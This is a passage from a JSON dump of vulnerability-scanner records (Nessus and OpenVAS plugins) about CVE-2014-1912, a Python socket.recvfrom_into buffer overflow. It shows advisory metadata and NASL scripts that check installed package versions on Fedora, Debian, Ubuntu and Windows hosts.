http://bugs.python.org/issue20246\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://bugs.python.org/issue20246\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.python.org/issue20246\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1062370\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128243.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?df10387d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"python-2.7.5-10.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:18:00", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1062370", "https://bugs.python.org/issue20246", "http://www.nessus.org/u?a4b5e889"], "pluginID": "72524", "description": "Buffer overflow fix.\n\nSee upstream issue: http://bugs.python.org/issue20246\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 8, "reporter": "Tenable", "published": "2014-02-17T00:00:00", "title": "Fedora 20 : python3-3.3.2-9.fc20 (2014-2418)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1912"], "modified": "2018-11-20T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:python3", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-2418.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=72524", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-2418.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72524);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/11/20 11:04:17\");\n\n script_cve_id(\"CVE-2014-1912\");\n script_bugtraq_id(65379);\n script_xref(name:\"FEDORA\", value:\"2014-2418\");\n\n script_name(english:\"Fedora 20 : python3-3.3.2-9.fc20 (2014-2418)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Buffer overflow fix.\n\nSee upstream issue: http://bugs.python.org/issue20246\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://bugs.python.org/issue20246\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.python.org/issue20246\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1062370\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128361.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a4b5e889\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python3 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"python3-3.3.2-9.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python3\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:18:08", "references": ["https://packages.debian.org/source/wheezy/python2.7", "https://security-tracker.debian.org/tracker/CVE-2013-4238", "https://www.debian.org/security/2014/dsa-2880", "https://security-tracker.debian.org/tracker/CVE-2014-1912"], "pluginID": "73065", "description": "Multiple security issues were discovered in Python :\n\n - CVE-2013-4238\n Ryan Sleevi discovered that NULL characters in the\n subject alternate names of SSL cerficates were parsed\n incorrectly.\n\n - CVE-2014-1912\n Ryan Smith-Roberts discovered a buffer overflow in the\n socket.recvfrom_into() function.", "edition": 9, "reporter": "Tenable", "published": "2014-03-18T00:00:00", "title": "Debian DSA-2880-1 : python2.7 - security update", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1912", "CVE-2013-4238"], "modified": "2018-11-10T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:7.0", "p-cpe:/a:debian:debian_linux:python2.7"], "id": "DEBIAN_DSA-2880.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=73065", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2880. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73065);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/11/10 11:49:36\");\n\n script_cve_id(\"CVE-2013-4238\", \"CVE-2014-1912\");\n script_bugtraq_id(61738, 65379);\n script_xref(name:\"DSA\", value:\"2880\");\n\n script_name(english:\"Debian DSA-2880-1 : python2.7 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple security issues were discovered in Python :\n\n - CVE-2013-4238\n Ryan Sleevi discovered that NULL characters in the\n subject alternate names of SSL cerficates were parsed\n incorrectly.\n\n - CVE-2014-1912\n Ryan Smith-Roberts discovered a buffer overflow in the\n socket.recvfrom_into() function.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2013-4238\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2014-1912\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/python2.7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2014/dsa-2880\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the python2.7 packages.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 2.7.3-6+deb7u2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:python2.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"idle-python2.7\", reference:\"2.7.3-6+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libpython2.7\", reference:\"2.7.3-6+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"python2.7\", reference:\"2.7.3-6+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"python2.7-dbg\", reference:\"2.7.3-6+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"python2.7-dev\", reference:\"2.7.3-6+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"python2.7-doc\", reference:\"2.7.3-6+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"python2.7-examples\", reference:\"2.7.3-6+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"python2.7-minimal\", reference:\"2.7.3-6+deb7u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-25T10:48:25", "references": ["https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128243.html", "2014-2394"], "pluginID": "867505", "description": "Check for the Version of python", "edition": 2, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-02-17T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Fedora Update for python FEDORA-2014-2394", "type": "openvas", "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1912"], "modified": "2017-07-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=867505", "id": "OPENVAS:867505", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python FEDORA-2014-2394\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867505);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-17 11:36:57 +0530 (Mon, 17 Feb 2014)\");\n script_cve_id(\"CVE-2014-1912\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for python FEDORA-2014-2394\");\n\n tag_insight = \"Python is an interpreted, interactive, object-oriented programming\nlanguage often compared to Tcl, Perl, Scheme or Java. Python includes\nmodules, classes, exceptions, very high level dynamic data types and\ndynamic typing. Python supports interfaces to many system calls and\nlibraries, as well as to various windowing systems (X11, Motif, Tk,\nMac and MFC).\n\nProgrammers can write new built-in modules for Python in C or C++.\nPython can be used as an extension language for applications that need\na programmable interface.\n\nNote that documentation for Python is provided in the python-docs\npackage.\n\nThis package provides the 'python' executable most of the actual\nimplementation is within the 'python-libs' package.\n\";\n\n tag_affected = \"python on Fedora 20\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-2394\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128243.html\");\n script_summary(\"Check for the Version of python\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"python\", rpm:\"python~2.7.5~10.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-11-15T12:56:21", "references": ["http://pastebin.com/raw.php?i=GHXSmNEg", "http://www.securitytracker.com/id/1029831", "http://www.python.org/download/", "http://secunia.com/advisories/56624", "http://bugs.python.org/issue20246", "http://www.exploit-db.com/exploits/31875"], "pluginID": "1361412562310804322", "description": "This host is installed with Python and is prone to buffer overflow\n vulnerability.", "edition": 9, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-03-05T00:00:00", "title": "Python 'socket.recvfrom_into' Buffer Overflow Vulnerability Mar14 (Windows)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Buffer overflow", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1912"], "modified": "2018-11-15T00:00:00", "id": "OPENVAS:1361412562310804322", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804322", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_python_bof_vuln_mar14_win.nasl 12358 2018-11-15 07:57:20Z cfischer $\n#\n# Python 'socket.recvfrom_into' Buffer Overflow Vulnerability Mar14 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:python:python\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804322\");\n script_version(\"$Revision: 12358 $\");\n script_cve_id(\"CVE-2014-1912\");\n script_bugtraq_id(65379);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-15 08:57:20 +0100 (Thu, 15 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-05 12:18:28 +0530 (Wed, 05 Mar 2014)\");\n script_name(\"Python 'socket.recvfrom_into' Buffer Overflow Vulnerability Mar14 (Windows)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"gb_python_detect_win.nasl\");\n script_mandatory_keys(\"python6432/win/detected\");\n\n script_xref(name:\"URL\", value:\"http://bugs.python.org/issue20246\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/56624\");\n script_xref(name:\"URL\", value:\"http://pastebin.com/raw.php?i=GHXSmNEg\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/31875\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id/1029831\");\n script_xref(name:\"URL\", value:\"http://www.python.org/download/\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Python and is prone to buffer overflow\n vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Flaw is due to a boundary error within the 'sock_recvfrom_into' function.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote attacker to cause a buffer\n overflow, resulting in a denial of service or potentially allowing the execution of arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Python version 2.5 before 2.7.7 and 3.x before 3.3.4\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Python version 2.7.7, 3.3.4 or later.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\npyVer = infos['version'];\npypath = infos['location'];\n\nif(version_in_range(version:pyVer, test_version:\"2.5\", test_version2:\"2.7.6150\")||\n version_in_range(version:pyVer, test_version:\"3.0\", test_version2:\"3.3.3150\")){\n report = report_fixed_ver(installed_version:pyVer, fixed_version:\"2.7.7/3.3.4\", install_path:pypath);\n security_message(data:report);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:48:49", "references": ["2014-2418", "https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128361.html"], "pluginID": "867510", "description": "Check for the Version of python3", "edition": 2, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-02-17T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Fedora Update for python3 FEDORA-2014-2418", "type": "openvas", "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1912"], "modified": "2017-07-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=867510", "id": "OPENVAS:867510", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python3 FEDORA-2014-2418\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867510);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-17 11:38:03 +0530 (Mon, 17 Feb 2014)\");\n script_cve_id(\"CVE-2014-1912\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for python3 FEDORA-2014-2418\");\n\n tag_insight = \"Python 3 is a new version of the language that is incompatible with the 2.x\nline of releases. The language is mostly the same, but many details, especially\nhow built-in objects like dictionaries and strings work, have changed\nconsiderably, and a lot of deprecated features have finally been removed.\n\";\n\n tag_affected = \"python3 on Fedora 20\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-2418\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128361.html\");\n script_summary(\"Check for the Version of python3\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"python3\", rpm:\"python3~3.3.2~9.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-04T11:16:43", "references": ["2125-1", "http://www.ubuntu.com/usn/usn-2125-1/"], "pluginID": "841733", "description": "Check for the Version of python2.7", "edition": 3, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-03-04T00:00:00", "title": "Ubuntu Update for python2.7 USN-2125-1", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1912"], "modified": "2017-12-01T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=841733", "id": "OPENVAS:841733", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2125_1.nasl 7957 2017-12-01 06:40:08Z santu $\n#\n# Ubuntu Update for python2.7 USN-2125-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(841733);\n script_version(\"$Revision: 7957 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:40:08 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-04 10:50:18 +0530 (Tue, 04 Mar 2014)\");\n script_cve_id(\"CVE-2014-1912\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Ubuntu Update for python2.7 USN-2125-1\");\n\n tag_insight = \"Ryan Smith-Roberts discovered that Python incorrectly handled\nbuffer sizes when using the socket.recvfrom_into() function. An attacker could\npossibly use this issue to cause Python to crash, resulting in denial of\nservice, or possibly execute arbitrary code.\";\n\n tag_affected = \"python2.7 on Ubuntu 13.10 ,\n Ubuntu 12.10 ,\n Ubuntu 12.04 LTS ,\n Ubuntu 10.04 LTS\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", 